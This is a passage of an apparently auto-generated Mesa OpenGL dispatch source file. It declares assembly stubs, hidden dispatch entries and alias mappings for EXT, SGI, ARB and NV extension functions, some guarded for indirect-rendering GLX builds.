GL_STUB(PassTexCoordATI, _gloffset_PassTexCoordATI, PassTexCoordATI@12)
GL_STUB(SampleMapATI, _gloffset_SampleMapATI, SampleMapATI@12)
GL_STUB(SetFragmentShaderConstantATI, _gloffset_SetFragmentShaderConstantATI, SetFragmentShaderConstantATI@8)
GL_STUB(PointParameteriNV, _gloffset_PointParameteriNV, PointParameteriNV@8)
GL_STUB(PointParameterivNV, _gloffset_PointParameterivNV, PointParameterivNV@8)
GL_STUB(_dispatch_stub_733, _gloffset_ActiveStencilFaceEXT, _dispatch_stub_733@4)
HIDDEN(GL_PREFIX(_dispatch_stub_733, _dispatch_stub_733@4))
GL_STUB(_dispatch_stub_734, _gloffset_BindVertexArrayAPPLE, _dispatch_stub_734@4)
HIDDEN(GL_PREFIX(_dispatch_stub_734, _dispatch_stub_734@4))
GL_STUB(_dispatch_stub_735, _gloffset_DeleteVertexArraysAPPLE, _dispatch_stub_735@8)
HIDDEN(GL_PREFIX(_dispatch_stub_735, _dispatch_stub_735@8))
GL_STUB(_dispatch_stub_736, _gloffset_GenVertexArraysAPPLE, _dispatch_stub_736@8)
HIDDEN(GL_PREFIX(_dispatch_stub_736, _dispatch_stub_736@8))
GL_STUB(_dispatch_stub_737, _gloffset_IsVertexArrayAPPLE, _dispatch_stub_737@4)
HIDDEN(GL_PREFIX(_dispatch_stub_737, _dispatch_stub_737@4))
GL_STUB(GetProgramNamedParameterdvNV, _gloffset_GetProgramNamedParameterdvNV, GetProgramNamedParameterdvNV@16)
GL_STUB(GetProgramNamedParameterfvNV, _gloffset_GetProgramNamedParameterfvNV, GetProgramNamedParameterfvNV@16)
GL_STUB(ProgramNamedParameter4dNV, _gloffset_ProgramNamedParameter4dNV, ProgramNamedParameter4dNV@44)
GL_STUB(ProgramNamedParameter4dvNV, _gloffset_ProgramNamedParameter4dvNV, ProgramNamedParameter4dvNV@16)
GL_STUB(ProgramNamedParameter4fNV, _gloffset_ProgramNamedParameter4fNV, ProgramNamedParameter4fNV@28)
GL_STUB(ProgramNamedParameter4fvNV, _gloffset_ProgramNamedParameter4fvNV, ProgramNamedParameter4fvNV@16)
GL_STUB(_dispatch_stub_744, _gloffset_DepthBoundsEXT, _dispatch_stub_744@16)
HIDDEN(GL_PREFIX(_dispatch_stub_744, _dispatch_stub_744@16))
GL_STUB(_dispatch_stub_745, _gloffset_BlendEquationSeparateEXT, _dispatch_stub_745@8)
HIDDEN(GL_PREFIX(_dispatch_stub_745, _dispatch_stub_745@8))
GL_STUB(BindFramebufferEXT, _gloffset_BindFramebufferEXT, BindFramebufferEXT@8)
GL_STUB(BindRenderbufferEXT, _gloffset_BindRenderbufferEXT, BindRenderbufferEXT@8)
GL_STUB(CheckFramebufferStatusEXT, _gloffset_CheckFramebufferStatusEXT, CheckFramebufferStatusEXT@4)
GL_STUB(DeleteFramebuffersEXT, _gloffset_DeleteFramebuffersEXT, DeleteFramebuffersEXT@8)
GL_STUB(DeleteRenderbuffersEXT, _gloffset_DeleteRenderbuffersEXT, DeleteRenderbuffersEXT@8)
GL_STUB(FramebufferRenderbufferEXT, _gloffset_FramebufferRenderbufferEXT, FramebufferRenderbufferEXT@16)
GL_STUB(FramebufferTexture1DEXT, _gloffset_FramebufferTexture1DEXT, FramebufferTexture1DEXT@20)
GL_STUB(FramebufferTexture2DEXT, _gloffset_FramebufferTexture2DEXT, FramebufferTexture2DEXT@20)
GL_STUB(FramebufferTexture3DEXT, _gloffset_FramebufferTexture3DEXT, FramebufferTexture3DEXT@24)
GL_STUB(GenFramebuffersEXT, _gloffset_GenFramebuffersEXT, GenFramebuffersEXT@8)
GL_STUB(GenRenderbuffersEXT, _gloffset_GenRenderbuffersEXT, GenRenderbuffersEXT@8)
GL_STUB(GenerateMipmapEXT, _gloffset_GenerateMipmapEXT, GenerateMipmapEXT@4)
GL_STUB(GetFramebufferAttachmentParameterivEXT, _gloffset_GetFramebufferAttachmentParameterivEXT, GetFramebufferAttachmentParameterivEXT@16)
GL_STUB(GetRenderbufferParameterivEXT, _gloffset_GetRenderbufferParameterivEXT, GetRenderbufferParameterivEXT@12)
GL_STUB(IsFramebufferEXT, _gloffset_IsFramebufferEXT, IsFramebufferEXT@4)
GL_STUB(IsRenderbufferEXT, _gloffset_IsRenderbufferEXT, IsRenderbufferEXT@4)
GL_STUB(RenderbufferStorageEXT, _gloffset_RenderbufferStorageEXT, RenderbufferStorageEXT@16)
GL_STUB(_dispatch_stub_763, _gloffset_BlitFramebufferEXT, _dispatch_stub_763@40)
HIDDEN(GL_PREFIX(_dispatch_stub_763, _dispatch_stub_763@40))
GL_STUB(FramebufferTextureLayerEXT, _gloffset_FramebufferTextureLayerEXT, FramebufferTextureLayerEXT@20)
GL_STUB(_dispatch_stub_765, _gloffset_StencilFuncSeparateATI, _dispatch_stub_765@16)
HIDDEN(GL_PREFIX(_dispatch_stub_765, _dispatch_stub_765@16))
GL_STUB(_dispatch_stub_766, _gloffset_ProgramEnvParameters4fvEXT, _dispatch_stub_766@16)
HIDDEN(GL_PREFIX(_dispatch_stub_766, _dispatch_stub_766@16))
GL_STUB(_dispatch_stub_767, _gloffset_ProgramLocalParameters4fvEXT, _dispatch_stub_767@16)
HIDDEN(GL_PREFIX(_dispatch_stub_767, _dispatch_stub_767@16))
GL_STUB(_dispatch_stub_768, _gloffset_GetQueryObjecti64vEXT, _dispatch_stub_768@12)
HIDDEN(GL_PREFIX(_dispatch_stub_768, _dispatch_stub_768@12))
GL_STUB(_dispatch_stub_769, _gloffset_GetQueryObjectui64vEXT, _dispatch_stub_769@12)
HIDDEN(GL_PREFIX(_dispatch_stub_769, _dispatch_stub_769@12))
/*
 * GL_STUB_ALIAS(alias, dispatch_offset, alias@argbytes, func, func@argbytes):
 * emits `alias` as an alternate entry point for the already-defined stub
 * `func`; both dispatch through the same table slot (`dispatch_offset`).
 * The `@n` decorations carry the stdcall argument-byte counts.
 *
 * NOTE(review): blocks wrapped in `#ifndef GLX_INDIRECT_RENDERING` are
 * omitted in indirect-rendering GLX builds — presumably because those
 * entry points are provided elsewhere in that configuration; confirm
 * against the generator before relying on this.
 */
/* GL_EXT_texture_object / EXT_vertex_array aliases for core entry points. */
GL_STUB_ALIAS(ArrayElementEXT, _gloffset_ArrayElement, ArrayElementEXT@4, ArrayElement, ArrayElement@4)
GL_STUB_ALIAS(BindTextureEXT, _gloffset_BindTexture, BindTextureEXT@8, BindTexture, BindTexture@8)
GL_STUB_ALIAS(DrawArraysEXT, _gloffset_DrawArrays, DrawArraysEXT@12, DrawArrays, DrawArrays@12)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(AreTexturesResidentEXT, _gloffset_AreTexturesResident, AreTexturesResidentEXT@12, AreTexturesResident, AreTexturesResident@12)
#endif
GL_STUB_ALIAS(CopyTexImage1DEXT, _gloffset_CopyTexImage1D, CopyTexImage1DEXT@28, CopyTexImage1D, CopyTexImage1D@28)
GL_STUB_ALIAS(CopyTexImage2DEXT, _gloffset_CopyTexImage2D, CopyTexImage2DEXT@32, CopyTexImage2D, CopyTexImage2D@32)
GL_STUB_ALIAS(CopyTexSubImage1DEXT, _gloffset_CopyTexSubImage1D, CopyTexSubImage1DEXT@24, CopyTexSubImage1D, CopyTexSubImage1D@24)
GL_STUB_ALIAS(CopyTexSubImage2DEXT, _gloffset_CopyTexSubImage2D, CopyTexSubImage2DEXT@32, CopyTexSubImage2D, CopyTexSubImage2D@32)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(DeleteTexturesEXT, _gloffset_DeleteTextures, DeleteTexturesEXT@8, DeleteTextures, DeleteTextures@8)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GenTexturesEXT, _gloffset_GenTextures, GenTexturesEXT@8, GenTextures, GenTextures@8)
#endif
GL_STUB_ALIAS(GetPointervEXT, _gloffset_GetPointerv, GetPointervEXT@8, GetPointerv, GetPointerv@8)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(IsTextureEXT, _gloffset_IsTexture, IsTextureEXT@4, IsTexture, IsTexture@4)
#endif
GL_STUB_ALIAS(PrioritizeTexturesEXT, _gloffset_PrioritizeTextures, PrioritizeTexturesEXT@12, PrioritizeTextures, PrioritizeTextures@12)
GL_STUB_ALIAS(TexSubImage1DEXT, _gloffset_TexSubImage1D, TexSubImage1DEXT@28, TexSubImage1D, TexSubImage1D@28)
GL_STUB_ALIAS(TexSubImage2DEXT, _gloffset_TexSubImage2D, TexSubImage2DEXT@36, TexSubImage2D, TexSubImage2D@36)
GL_STUB_ALIAS(BlendColorEXT, _gloffset_BlendColor, BlendColorEXT@16, BlendColor, BlendColor@16)
GL_STUB_ALIAS(BlendEquationEXT, _gloffset_BlendEquation, BlendEquationEXT@4, BlendEquation, BlendEquation@4)
GL_STUB_ALIAS(DrawRangeElementsEXT, _gloffset_DrawRangeElements, DrawRangeElementsEXT@24, DrawRangeElements, DrawRangeElements@24)
/* SGI/EXT color-table and convolution (ARB_imaging) aliases. */
GL_STUB_ALIAS(ColorTableSGI, _gloffset_ColorTable, ColorTableSGI@24, ColorTable, ColorTable@24)
GL_STUB_ALIAS(ColorTableEXT, _gloffset_ColorTable, ColorTableEXT@24, ColorTable, ColorTable@24)
GL_STUB_ALIAS(ColorTableParameterfvSGI, _gloffset_ColorTableParameterfv, ColorTableParameterfvSGI@12, ColorTableParameterfv, ColorTableParameterfv@12)
GL_STUB_ALIAS(ColorTableParameterivSGI, _gloffset_ColorTableParameteriv, ColorTableParameterivSGI@12, ColorTableParameteriv, ColorTableParameteriv@12)
GL_STUB_ALIAS(CopyColorTableSGI, _gloffset_CopyColorTable, CopyColorTableSGI@20, CopyColorTable, CopyColorTable@20)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableSGI, _gloffset_GetColorTable, GetColorTableSGI@16, GetColorTable, GetColorTable@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableEXT, _gloffset_GetColorTable, GetColorTableEXT@16, GetColorTable, GetColorTable@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterfvSGI, _gloffset_GetColorTableParameterfv, GetColorTableParameterfvSGI@12, GetColorTableParameterfv, GetColorTableParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterfvEXT, _gloffset_GetColorTableParameterfv, GetColorTableParameterfvEXT@12, GetColorTableParameterfv, GetColorTableParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterivSGI, _gloffset_GetColorTableParameteriv, GetColorTableParameterivSGI@12, GetColorTableParameteriv, GetColorTableParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetColorTableParameterivEXT, _gloffset_GetColorTableParameteriv, GetColorTableParameterivEXT@12, GetColorTableParameteriv, GetColorTableParameteriv@12)
#endif
GL_STUB_ALIAS(ColorSubTableEXT, _gloffset_ColorSubTable, ColorSubTableEXT@24, ColorSubTable, ColorSubTable@24)
GL_STUB_ALIAS(CopyColorSubTableEXT, _gloffset_CopyColorSubTable, CopyColorSubTableEXT@20, CopyColorSubTable, CopyColorSubTable@20)
GL_STUB_ALIAS(ConvolutionFilter1DEXT, _gloffset_ConvolutionFilter1D, ConvolutionFilter1DEXT@24, ConvolutionFilter1D, ConvolutionFilter1D@24)
GL_STUB_ALIAS(ConvolutionFilter2DEXT, _gloffset_ConvolutionFilter2D, ConvolutionFilter2DEXT@28, ConvolutionFilter2D, ConvolutionFilter2D@28)
GL_STUB_ALIAS(ConvolutionParameterfEXT, _gloffset_ConvolutionParameterf, ConvolutionParameterfEXT@12, ConvolutionParameterf, ConvolutionParameterf@12)
GL_STUB_ALIAS(ConvolutionParameterfvEXT, _gloffset_ConvolutionParameterfv, ConvolutionParameterfvEXT@12, ConvolutionParameterfv, ConvolutionParameterfv@12)
GL_STUB_ALIAS(ConvolutionParameteriEXT, _gloffset_ConvolutionParameteri, ConvolutionParameteriEXT@12, ConvolutionParameteri, ConvolutionParameteri@12)
GL_STUB_ALIAS(ConvolutionParameterivEXT, _gloffset_ConvolutionParameteriv, ConvolutionParameterivEXT@12, ConvolutionParameteriv, ConvolutionParameteriv@12)
GL_STUB_ALIAS(CopyConvolutionFilter1DEXT, _gloffset_CopyConvolutionFilter1D, CopyConvolutionFilter1DEXT@20, CopyConvolutionFilter1D, CopyConvolutionFilter1D@20)
GL_STUB_ALIAS(CopyConvolutionFilter2DEXT, _gloffset_CopyConvolutionFilter2D, CopyConvolutionFilter2DEXT@24, CopyConvolutionFilter2D, CopyConvolutionFilter2D@24)
/* Imaging-subset query aliases (guarded for indirect rendering) plus
 * histogram/minmax and EXT_texture3D aliases. */
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionFilterEXT, _gloffset_GetConvolutionFilter, GetConvolutionFilterEXT@16, GetConvolutionFilter, GetConvolutionFilter@16)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionParameterfvEXT, _gloffset_GetConvolutionParameterfv, GetConvolutionParameterfvEXT@12, GetConvolutionParameterfv, GetConvolutionParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetConvolutionParameterivEXT, _gloffset_GetConvolutionParameteriv, GetConvolutionParameterivEXT@12, GetConvolutionParameteriv, GetConvolutionParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetSeparableFilterEXT, _gloffset_GetSeparableFilter, GetSeparableFilterEXT@24, GetSeparableFilter, GetSeparableFilter@24)
#endif
GL_STUB_ALIAS(SeparableFilter2DEXT, _gloffset_SeparableFilter2D, SeparableFilter2DEXT@32, SeparableFilter2D, SeparableFilter2D@32)
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramEXT, _gloffset_GetHistogram, GetHistogramEXT@20, GetHistogram, GetHistogram@20)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramParameterfvEXT, _gloffset_GetHistogramParameterfv, GetHistogramParameterfvEXT@12, GetHistogramParameterfv, GetHistogramParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetHistogramParameterivEXT, _gloffset_GetHistogramParameteriv, GetHistogramParameterivEXT@12, GetHistogramParameteriv, GetHistogramParameteriv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxEXT, _gloffset_GetMinmax, GetMinmaxEXT@20, GetMinmax, GetMinmax@20)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxParameterfvEXT, _gloffset_GetMinmaxParameterfv, GetMinmaxParameterfvEXT@12, GetMinmaxParameterfv, GetMinmaxParameterfv@12)
#endif
#ifndef GLX_INDIRECT_RENDERING
GL_STUB_ALIAS(GetMinmaxParameterivEXT, _gloffset_GetMinmaxParameteriv, GetMinmaxParameterivEXT@12, GetMinmaxParameteriv, GetMinmaxParameteriv@12)
#endif
GL_STUB_ALIAS(HistogramEXT, _gloffset_Histogram, HistogramEXT@16, Histogram, Histogram@16)
GL_STUB_ALIAS(MinmaxEXT, _gloffset_Minmax, MinmaxEXT@12, Minmax, Minmax@12)
GL_STUB_ALIAS(ResetHistogramEXT, _gloffset_ResetHistogram, ResetHistogramEXT@4, ResetHistogram, ResetHistogram@4)
GL_STUB_ALIAS(ResetMinmaxEXT, _gloffset_ResetMinmax, ResetMinmaxEXT@4, ResetMinmax, ResetMinmax@4)
GL_STUB_ALIAS(TexImage3DEXT, _gloffset_TexImage3D, TexImage3DEXT@40, TexImage3D, TexImage3D@40)
GL_STUB_ALIAS(TexSubImage3DEXT, _gloffset_TexSubImage3D, TexSubImage3DEXT@44, TexSubImage3D, TexSubImage3D@44)
GL_STUB_ALIAS(CopyTexSubImage3DEXT, _gloffset_CopyTexSubImage3D, CopyTexSubImage3DEXT@36, CopyTexSubImage3D, CopyTexSubImage3D@36)
/* Core GL 1.3/1.4 names aliased onto their ARB-suffixed stubs
 * (multitexture, transpose matrices, multisample, compressed textures),
 * and NV program-parameter names aliased onto ARB_vertex_program stubs. */
GL_STUB_ALIAS(ActiveTexture, _gloffset_ActiveTextureARB, ActiveTexture@4, ActiveTextureARB, ActiveTextureARB@4)
GL_STUB_ALIAS(ClientActiveTexture, _gloffset_ClientActiveTextureARB, ClientActiveTexture@4, ClientActiveTextureARB, ClientActiveTextureARB@4)
GL_STUB_ALIAS(MultiTexCoord1d, _gloffset_MultiTexCoord1dARB, MultiTexCoord1d@12, MultiTexCoord1dARB, MultiTexCoord1dARB@12)
GL_STUB_ALIAS(MultiTexCoord1dv, _gloffset_MultiTexCoord1dvARB, MultiTexCoord1dv@8, MultiTexCoord1dvARB, MultiTexCoord1dvARB@8)
GL_STUB_ALIAS(MultiTexCoord1f, _gloffset_MultiTexCoord1fARB, MultiTexCoord1f@8, MultiTexCoord1fARB, MultiTexCoord1fARB@8)
GL_STUB_ALIAS(MultiTexCoord1fv, _gloffset_MultiTexCoord1fvARB, MultiTexCoord1fv@8, MultiTexCoord1fvARB, MultiTexCoord1fvARB@8)
GL_STUB_ALIAS(MultiTexCoord1i, _gloffset_MultiTexCoord1iARB, MultiTexCoord1i@8, MultiTexCoord1iARB, MultiTexCoord1iARB@8)
GL_STUB_ALIAS(MultiTexCoord1iv, _gloffset_MultiTexCoord1ivARB, MultiTexCoord1iv@8, MultiTexCoord1ivARB, MultiTexCoord1ivARB@8)
GL_STUB_ALIAS(MultiTexCoord1s, _gloffset_MultiTexCoord1sARB, MultiTexCoord1s@8, MultiTexCoord1sARB, MultiTexCoord1sARB@8)
GL_STUB_ALIAS(MultiTexCoord1sv, _gloffset_MultiTexCoord1svARB, MultiTexCoord1sv@8, MultiTexCoord1svARB, MultiTexCoord1svARB@8)
GL_STUB_ALIAS(MultiTexCoord2d, _gloffset_MultiTexCoord2dARB, MultiTexCoord2d@20, MultiTexCoord2dARB, MultiTexCoord2dARB@20)
GL_STUB_ALIAS(MultiTexCoord2dv, _gloffset_MultiTexCoord2dvARB, MultiTexCoord2dv@8, MultiTexCoord2dvARB, MultiTexCoord2dvARB@8)
GL_STUB_ALIAS(MultiTexCoord2f, _gloffset_MultiTexCoord2fARB, MultiTexCoord2f@12, MultiTexCoord2fARB, MultiTexCoord2fARB@12)
GL_STUB_ALIAS(MultiTexCoord2fv, _gloffset_MultiTexCoord2fvARB, MultiTexCoord2fv@8, MultiTexCoord2fvARB, MultiTexCoord2fvARB@8)
GL_STUB_ALIAS(MultiTexCoord2i, _gloffset_MultiTexCoord2iARB, MultiTexCoord2i@12, MultiTexCoord2iARB, MultiTexCoord2iARB@12)
GL_STUB_ALIAS(MultiTexCoord2iv, _gloffset_MultiTexCoord2ivARB, MultiTexCoord2iv@8, MultiTexCoord2ivARB, MultiTexCoord2ivARB@8)
GL_STUB_ALIAS(MultiTexCoord2s, _gloffset_MultiTexCoord2sARB, MultiTexCoord2s@12, MultiTexCoord2sARB, MultiTexCoord2sARB@12)
GL_STUB_ALIAS(MultiTexCoord2sv, _gloffset_MultiTexCoord2svARB, MultiTexCoord2sv@8, MultiTexCoord2svARB, MultiTexCoord2svARB@8)
GL_STUB_ALIAS(MultiTexCoord3d, _gloffset_MultiTexCoord3dARB, MultiTexCoord3d@28, MultiTexCoord3dARB, MultiTexCoord3dARB@28)
GL_STUB_ALIAS(MultiTexCoord3dv, _gloffset_MultiTexCoord3dvARB, MultiTexCoord3dv@8, MultiTexCoord3dvARB, MultiTexCoord3dvARB@8)
GL_STUB_ALIAS(MultiTexCoord3f, _gloffset_MultiTexCoord3fARB, MultiTexCoord3f@16, MultiTexCoord3fARB, MultiTexCoord3fARB@16)
GL_STUB_ALIAS(MultiTexCoord3fv, _gloffset_MultiTexCoord3fvARB, MultiTexCoord3fv@8, MultiTexCoord3fvARB, MultiTexCoord3fvARB@8)
GL_STUB_ALIAS(MultiTexCoord3i, _gloffset_MultiTexCoord3iARB, MultiTexCoord3i@16, MultiTexCoord3iARB, MultiTexCoord3iARB@16)
GL_STUB_ALIAS(MultiTexCoord3iv, _gloffset_MultiTexCoord3ivARB, MultiTexCoord3iv@8, MultiTexCoord3ivARB, MultiTexCoord3ivARB@8)
GL_STUB_ALIAS(MultiTexCoord3s, _gloffset_MultiTexCoord3sARB, MultiTexCoord3s@16, MultiTexCoord3sARB, MultiTexCoord3sARB@16)
GL_STUB_ALIAS(MultiTexCoord3sv, _gloffset_MultiTexCoord3svARB, MultiTexCoord3sv@8, MultiTexCoord3svARB, MultiTexCoord3svARB@8)
GL_STUB_ALIAS(MultiTexCoord4d, _gloffset_MultiTexCoord4dARB, MultiTexCoord4d@36, MultiTexCoord4dARB, MultiTexCoord4dARB@36)
GL_STUB_ALIAS(MultiTexCoord4dv, _gloffset_MultiTexCoord4dvARB, MultiTexCoord4dv@8, MultiTexCoord4dvARB, MultiTexCoord4dvARB@8)
GL_STUB_ALIAS(MultiTexCoord4f, _gloffset_MultiTexCoord4fARB, MultiTexCoord4f@20, MultiTexCoord4fARB, MultiTexCoord4fARB@20)
GL_STUB_ALIAS(MultiTexCoord4fv, _gloffset_MultiTexCoord4fvARB, MultiTexCoord4fv@8, MultiTexCoord4fvARB, MultiTexCoord4fvARB@8)
GL_STUB_ALIAS(MultiTexCoord4i, _gloffset_MultiTexCoord4iARB, MultiTexCoord4i@20, MultiTexCoord4iARB, MultiTexCoord4iARB@20)
GL_STUB_ALIAS(MultiTexCoord4iv, _gloffset_MultiTexCoord4ivARB, MultiTexCoord4iv@8, MultiTexCoord4ivARB, MultiTexCoord4ivARB@8)
GL_STUB_ALIAS(MultiTexCoord4s, _gloffset_MultiTexCoord4sARB, MultiTexCoord4s@20, MultiTexCoord4sARB, MultiTexCoord4sARB@20)
GL_STUB_ALIAS(MultiTexCoord4sv, _gloffset_MultiTexCoord4svARB, MultiTexCoord4sv@8, MultiTexCoord4svARB, MultiTexCoord4svARB@8)
GL_STUB_ALIAS(StencilOpSeparateATI, _gloffset_StencilOpSeparate, StencilOpSeparateATI@16, StencilOpSeparate, StencilOpSeparate@16)
GL_STUB_ALIAS(LoadTransposeMatrixd, _gloffset_LoadTransposeMatrixdARB, LoadTransposeMatrixd@4, LoadTransposeMatrixdARB, LoadTransposeMatrixdARB@4)
GL_STUB_ALIAS(LoadTransposeMatrixf, _gloffset_LoadTransposeMatrixfARB, LoadTransposeMatrixf@4, LoadTransposeMatrixfARB, LoadTransposeMatrixfARB@4)
GL_STUB_ALIAS(MultTransposeMatrixd, _gloffset_MultTransposeMatrixdARB, MultTransposeMatrixd@4, MultTransposeMatrixdARB, MultTransposeMatrixdARB@4)
GL_STUB_ALIAS(MultTransposeMatrixf, _gloffset_MultTransposeMatrixfARB, MultTransposeMatrixf@4, MultTransposeMatrixfARB, MultTransposeMatrixfARB@4)
GL_STUB_ALIAS(SampleCoverage, _gloffset_SampleCoverageARB, SampleCoverage@8, SampleCoverageARB, SampleCoverageARB@8)
GL_STUB_ALIAS(CompressedTexImage1D, _gloffset_CompressedTexImage1DARB, CompressedTexImage1D@28, CompressedTexImage1DARB, CompressedTexImage1DARB@28)
GL_STUB_ALIAS(CompressedTexImage2D, _gloffset_CompressedTexImage2DARB, CompressedTexImage2D@32, CompressedTexImage2DARB, CompressedTexImage2DARB@32)
GL_STUB_ALIAS(CompressedTexImage3D, _gloffset_CompressedTexImage3DARB, CompressedTexImage3D@36, CompressedTexImage3DARB, CompressedTexImage3DARB@36)
GL_STUB_ALIAS(CompressedTexSubImage1D, _gloffset_CompressedTexSubImage1DARB, CompressedTexSubImage1D@28, CompressedTexSubImage1DARB, CompressedTexSubImage1DARB@28)
GL_STUB_ALIAS(CompressedTexSubImage2D, _gloffset_CompressedTexSubImage2DARB, CompressedTexSubImage2D@36, CompressedTexSubImage2DARB, CompressedTexSubImage2DARB@36)
GL_STUB_ALIAS(CompressedTexSubImage3D, _gloffset_CompressedTexSubImage3DARB, CompressedTexSubImage3D@44, CompressedTexSubImage3DARB, CompressedTexSubImage3DARB@44)
GL_STUB_ALIAS(GetCompressedTexImage, _gloffset_GetCompressedTexImageARB, GetCompressedTexImage@12, GetCompressedTexImageARB, GetCompressedTexImageARB@12)
GL_STUB_ALIAS(DisableVertexAttribArray, _gloffset_DisableVertexAttribArrayARB, DisableVertexAttribArray@4, DisableVertexAttribArrayARB, DisableVertexAttribArrayARB@4)
GL_STUB_ALIAS(EnableVertexAttribArray, _gloffset_EnableVertexAttribArrayARB, EnableVertexAttribArray@4, EnableVertexAttribArrayARB, EnableVertexAttribArrayARB@4)
GL_STUB_ALIAS(GetVertexAttribdv, _gloffset_GetVertexAttribdvARB, GetVertexAttribdv@12, GetVertexAttribdvARB, GetVertexAttribdvARB@12)
GL_STUB_ALIAS(GetVertexAttribfv, _gloffset_GetVertexAttribfvARB, GetVertexAttribfv@12, GetVertexAttribfvARB, GetVertexAttribfvARB@12)
GL_STUB_ALIAS(GetVertexAttribiv, _gloffset_GetVertexAttribivARB, GetVertexAttribiv@12, GetVertexAttribivARB, GetVertexAttribivARB@12)
GL_STUB_ALIAS(ProgramParameter4dNV, _gloffset_ProgramEnvParameter4dARB, ProgramParameter4dNV@40, ProgramEnvParameter4dARB, ProgramEnvParameter4dARB@40)
GL_STUB_ALIAS(ProgramParameter4dvNV, _gloffset_ProgramEnvParameter4dvARB, ProgramParameter4dvNV@12, ProgramEnvParameter4dvARB, ProgramEnvParameter4dvARB@12)
GL_STUB_ALIAS(ProgramParameter4fNV, _gloffset_ProgramEnvParameter4fARB, ProgramParameter4fNV@24, ProgramEnvParameter4fARB, ProgramEnvParameter4fARB@24)
GL_STUB_ALIAS(ProgramParameter4fvNV, _gloffset_ProgramEnvParameter4fvARB, ProgramParameter4fvNV@12, ProgramEnvParameter4fvARB, ProgramEnvParameter4fvARB@12)
/* Core GL 1.5/2.0 names aliased onto ARB_vertex_program,
 * ARB_vertex_buffer_object and ARB_occlusion_query stubs. */
GL_STUB_ALIAS(VertexAttrib1d, _gloffset_VertexAttrib1dARB, VertexAttrib1d@12, VertexAttrib1dARB, VertexAttrib1dARB@12)
GL_STUB_ALIAS(VertexAttrib1dv, _gloffset_VertexAttrib1dvARB, VertexAttrib1dv@8, VertexAttrib1dvARB, VertexAttrib1dvARB@8)
GL_STUB_ALIAS(VertexAttrib1f, _gloffset_VertexAttrib1fARB, VertexAttrib1f@8, VertexAttrib1fARB, VertexAttrib1fARB@8)
GL_STUB_ALIAS(VertexAttrib1fv, _gloffset_VertexAttrib1fvARB, VertexAttrib1fv@8, VertexAttrib1fvARB, VertexAttrib1fvARB@8)
GL_STUB_ALIAS(VertexAttrib1s, _gloffset_VertexAttrib1sARB, VertexAttrib1s@8, VertexAttrib1sARB, VertexAttrib1sARB@8)
GL_STUB_ALIAS(VertexAttrib1sv, _gloffset_VertexAttrib1svARB, VertexAttrib1sv@8, VertexAttrib1svARB, VertexAttrib1svARB@8)
GL_STUB_ALIAS(VertexAttrib2d, _gloffset_VertexAttrib2dARB, VertexAttrib2d@20, VertexAttrib2dARB, VertexAttrib2dARB@20)
GL_STUB_ALIAS(VertexAttrib2dv, _gloffset_VertexAttrib2dvARB, VertexAttrib2dv@8, VertexAttrib2dvARB, VertexAttrib2dvARB@8)
GL_STUB_ALIAS(VertexAttrib2f, _gloffset_VertexAttrib2fARB, VertexAttrib2f@12, VertexAttrib2fARB, VertexAttrib2fARB@12)
GL_STUB_ALIAS(VertexAttrib2fv, _gloffset_VertexAttrib2fvARB, VertexAttrib2fv@8, VertexAttrib2fvARB, VertexAttrib2fvARB@8)
GL_STUB_ALIAS(VertexAttrib2s, _gloffset_VertexAttrib2sARB, VertexAttrib2s@12, VertexAttrib2sARB, VertexAttrib2sARB@12)
GL_STUB_ALIAS(VertexAttrib2sv, _gloffset_VertexAttrib2svARB, VertexAttrib2sv@8, VertexAttrib2svARB, VertexAttrib2svARB@8)
GL_STUB_ALIAS(VertexAttrib3d, _gloffset_VertexAttrib3dARB, VertexAttrib3d@28, VertexAttrib3dARB, VertexAttrib3dARB@28)
GL_STUB_ALIAS(VertexAttrib3dv, _gloffset_VertexAttrib3dvARB, VertexAttrib3dv@8, VertexAttrib3dvARB, VertexAttrib3dvARB@8)
GL_STUB_ALIAS(VertexAttrib3f, _gloffset_VertexAttrib3fARB, VertexAttrib3f@16, VertexAttrib3fARB, VertexAttrib3fARB@16)
GL_STUB_ALIAS(VertexAttrib3fv, _gloffset_VertexAttrib3fvARB, VertexAttrib3fv@8, VertexAttrib3fvARB, VertexAttrib3fvARB@8)
GL_STUB_ALIAS(VertexAttrib3s, _gloffset_VertexAttrib3sARB, VertexAttrib3s@16, VertexAttrib3sARB, VertexAttrib3sARB@16)
GL_STUB_ALIAS(VertexAttrib3sv, _gloffset_VertexAttrib3svARB, VertexAttrib3sv@8, VertexAttrib3svARB, VertexAttrib3svARB@8)
GL_STUB_ALIAS(VertexAttrib4Nbv, _gloffset_VertexAttrib4NbvARB, VertexAttrib4Nbv@8, VertexAttrib4NbvARB, VertexAttrib4NbvARB@8)
GL_STUB_ALIAS(VertexAttrib4Niv, _gloffset_VertexAttrib4NivARB, VertexAttrib4Niv@8, VertexAttrib4NivARB, VertexAttrib4NivARB@8)
GL_STUB_ALIAS(VertexAttrib4Nsv, _gloffset_VertexAttrib4NsvARB, VertexAttrib4Nsv@8, VertexAttrib4NsvARB, VertexAttrib4NsvARB@8)
